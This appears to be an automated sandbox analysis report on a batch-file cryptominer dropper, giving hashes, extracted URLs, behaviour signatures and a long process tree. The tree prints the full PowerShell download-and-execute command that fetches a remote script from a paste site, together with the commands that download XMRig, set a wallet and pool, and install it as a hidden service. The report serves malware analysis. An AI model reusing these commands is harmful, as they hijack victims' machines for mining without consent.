Analysis

  • max time kernel
    3s
  • max time network
    15s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 02:59

General

  • Target

    1645667596419.bat

  • Size

    517B

  • MD5

    ac9d73455d58bfa42f81e718b8c8d6b5

  • SHA1

    60040fff333b7bc09b22e5c013f11b8a99555ed3

  • SHA256

    4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

  • SHA512

    ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://rentry.co/regele/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

  • Stops running service(s) 4 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Delays execution with timeout.exe 60 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1645667596419.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1904
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2964
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFE17.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
        3⤵
          PID:2120
          • C:\Windows\system32\net.exe
            net session
            4⤵
              PID:1808
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 session
                5⤵
                  PID:3440
              • C:\Windows\system32\where.exe
                where powershell
                4⤵
                  PID:3660
                • C:\Windows\system32\where.exe
                  where find
                  4⤵
                    PID:1476
                  • C:\Windows\system32\where.exe
                    where findstr
                    4⤵
                      PID:4208
                    • C:\Windows\system32\where.exe
                      where tasklist
                      4⤵
                        PID:4512
                      • C:\Windows\system32\where.exe
                        where sc
                        4⤵
                          PID:3948
                        • C:\Windows\system32\sc.exe
                          sc stop moneroocean_miner
                          4⤵
                          • Launches sc.exe
                          PID:1320
                        • C:\Windows\system32\sc.exe
                          sc delete moneroocean_miner
                          4⤵
                          • Launches sc.exe
                          PID:5104
                        • C:\Windows\system32\taskkill.exe
                          taskkill /f /t /im xmrig.exe
                          4⤵
                          • Kills process with taskkill
                          PID:3308
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:1868
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:4420
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:2256
                        • C:\Users\Admin\moneroocean\xmrig.exe
                          "C:\Users\Admin\moneroocean\xmrig.exe" --help
                          4⤵
                            PID:3592
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                            4⤵
                              PID:2988
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:1008
                                • C:\Windows\system32\HOSTNAME.EXE
                                  "C:\Windows\system32\HOSTNAME.EXE"
                                  6⤵
                                    PID:3052
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:4388
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:2864
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Oailvcny\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:3596
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:5080
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:5112
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:3392
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:5016
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:3460
                              • C:\Windows\system32\sc.exe
                                sc stop moneroocean_miner
                                4⤵
                                • Launches sc.exe
                                PID:3684
                              • C:\Windows\system32\sc.exe
                                sc delete moneroocean_miner
                                4⤵
                                • Launches sc.exe
                                PID:3948
                              • C:\Users\Admin\moneroocean\nssm.exe
                                "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
                                4⤵
                                  PID:1592
                                • C:\Users\Admin\moneroocean\nssm.exe
                                  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
                                  4⤵
                                    PID:4884
                                  • C:\Users\Admin\moneroocean\nssm.exe
                                    "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
                                    4⤵
                                      PID:2864
                                    • C:\Users\Admin\moneroocean\nssm.exe
                                      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
                                      4⤵
                                        PID:1668
                                      • C:\Users\Admin\moneroocean\nssm.exe
                                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
                                        4⤵
                                          PID:1852
                                        • C:\Users\Admin\moneroocean\nssm.exe
                                          "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
                                          4⤵
                                            PID:1704
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                        2⤵
                                          PID:3632
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic cpu get loadpercentage
                                            3⤵
                                              PID:560
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 1
                                            2⤵
                                            • Delays execution with timeout.exe
                                            PID:816
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                            2⤵
                                              PID:2616
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic cpu get loadpercentage
                                                3⤵
                                                  PID:3620
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 1
                                                2⤵
                                                • Delays execution with timeout.exe
                                                PID:4008
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                2⤵
                                                  PID:3052
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic cpu get loadpercentage
                                                    3⤵
                                                      PID:3624
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 1
                                                    2⤵
                                                    • Delays execution with timeout.exe
                                                    PID:100
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                    2⤵
                                                      PID:2568
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic cpu get loadpercentage
                                                        3⤵
                                                          PID:4928
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout /t 1
                                                        2⤵
                                                        • Delays execution with timeout.exe
                                                        PID:4576
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                        2⤵
                                                          PID:3492
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic cpu get loadpercentage
                                                            3⤵
                                                              PID:496
                                                          • C:\Windows\system32\timeout.exe
                                                            timeout /t 1
                                                            2⤵
                                                            • Delays execution with timeout.exe
                                                            PID:3468
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                            2⤵
                                                              PID:1272
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic cpu get loadpercentage
                                                                3⤵
                                                                  PID:4456
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 1
                                                                2⤵
                                                                • Delays execution with timeout.exe
                                                                PID:1564
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                2⤵
                                                                  PID:1028
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic cpu get loadpercentage
                                                                    3⤵
                                                                      PID:3516
                                                                  • C:\Windows\system32\timeout.exe
                                                                    timeout /t 1
                                                                    2⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:5020
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                    2⤵
                                                                      PID:3428
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic cpu get loadpercentage
                                                                        3⤵
                                                                          PID:1344
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 1
                                                                        2⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:4660
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                        2⤵
                                                                          PID:1136
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic cpu get loadpercentage
                                                                            3⤵
                                                                              PID:2460
                                                                          • C:\Windows\system32\timeout.exe
                                                                            timeout /t 1
                                                                            2⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:2624
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                            2⤵
                                                                              PID:4012
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic cpu get loadpercentage
                                                                                3⤵
                                                                                  PID:4396
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 1
                                                                                2⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:2604
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                2⤵
                                                                                  PID:4288
                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                    wmic cpu get loadpercentage
                                                                                    3⤵
                                                                                      PID:3500
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout /t 1
                                                                                    2⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:976
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                    2⤵
                                                                                      PID:2012
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic cpu get loadpercentage
                                                                                        3⤵
                                                                                          PID:1940
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 1
                                                                                        2⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:100
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                        2⤵
                                                                                          PID:4036
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic cpu get loadpercentage
                                                                                            3⤵
                                                                                              PID:2136
                                                                                          • C:\Windows\system32\timeout.exe
                                                                                            timeout /t 1
                                                                                            2⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:440
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                            2⤵
                                                                                              PID:1324
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic cpu get loadpercentage
                                                                                                3⤵
                                                                                                  PID:1444
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                timeout /t 1
                                                                                                2⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:4148
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                2⤵
                                                                                                  PID:3100
                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                    wmic cpu get loadpercentage
                                                                                                    3⤵
                                                                                                      PID:4712
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    timeout /t 1
                                                                                                    2⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:2856
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                    2⤵
                                                                                                      PID:3112
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic cpu get loadpercentage
                                                                                                        3⤵
                                                                                                          PID:3684
                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                        timeout /t 1
                                                                                                        2⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:4740
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                        2⤵
                                                                                                          PID:4672
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic cpu get loadpercentage
                                                                                                            3⤵
                                                                                                              PID:1388
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            timeout /t 1
                                                                                                            2⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:2964
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                            2⤵
                                                                                                              PID:1344
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic cpu get loadpercentage
                                                                                                                3⤵
                                                                                                                  PID:4716
                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                timeout /t 1
                                                                                                                2⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:2868
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                2⤵
                                                                                                                  PID:316
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    wmic cpu get loadpercentage
                                                                                                                    3⤵
                                                                                                                      PID:2168
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 1
                                                                                                                    2⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:560
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                    2⤵
                                                                                                                      PID:2816
                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                        wmic cpu get loadpercentage
                                                                                                                        3⤵
                                                                                                                          PID:4396
                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                        timeout /t 1
                                                                                                                        2⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:3436
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                        2⤵
                                                                                                                          PID:4980
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic cpu get loadpercentage
                                                                                                                            3⤵
                                                                                                                              PID:400
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout /t 1
                                                                                                                            2⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:4404
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                            2⤵
                                                                                                                              PID:3624
                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                3⤵
                                                                                                                                  PID:2988
                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                timeout /t 1
                                                                                                                                2⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:4220
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                2⤵
                                                                                                                                  PID:2744
                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                    3⤵
                                                                                                                                      PID:3732
                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                    timeout /t 1
                                                                                                                                    2⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:112
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                    2⤵
                                                                                                                                      PID:1296
                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                        3⤵
                                                                                                                                          PID:2448
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        timeout /t 1
                                                                                                                                        2⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:1484
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                        2⤵
                                                                                                                                          PID:3060
                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                            3⤵
                                                                                                                                              PID:4456
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 1
                                                                                                                                            2⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:3100
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                            2⤵
                                                                                                                                              PID:2856
                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                3⤵
                                                                                                                                                  PID:116
                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                timeout /t 1
                                                                                                                                                2⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:3112
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                2⤵
                                                                                                                                                  PID:4740
                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2296
                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                    timeout /t 1
                                                                                                                                                    2⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:3516
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4960
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1092
                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                        timeout /t 1
                                                                                                                                                        2⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:1344
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4888
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4224
                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                            timeout /t 1
                                                                                                                                                            2⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:2460
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4872
                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:920
                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                timeout /t 1
                                                                                                                                                                2⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:3116
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4396
                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2836
                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                    timeout /t 1
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:2252
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4980
                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3052
                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                        timeout /t 1
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                        PID:1396
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2988
                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2924
                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                            timeout /t 1
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:4808
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1984
                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:2116
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:1592
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4684
                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4572
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:4456
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:3100
                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1704
                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:2856
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3112
                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4688
                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:4740
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4672
                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4100
                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
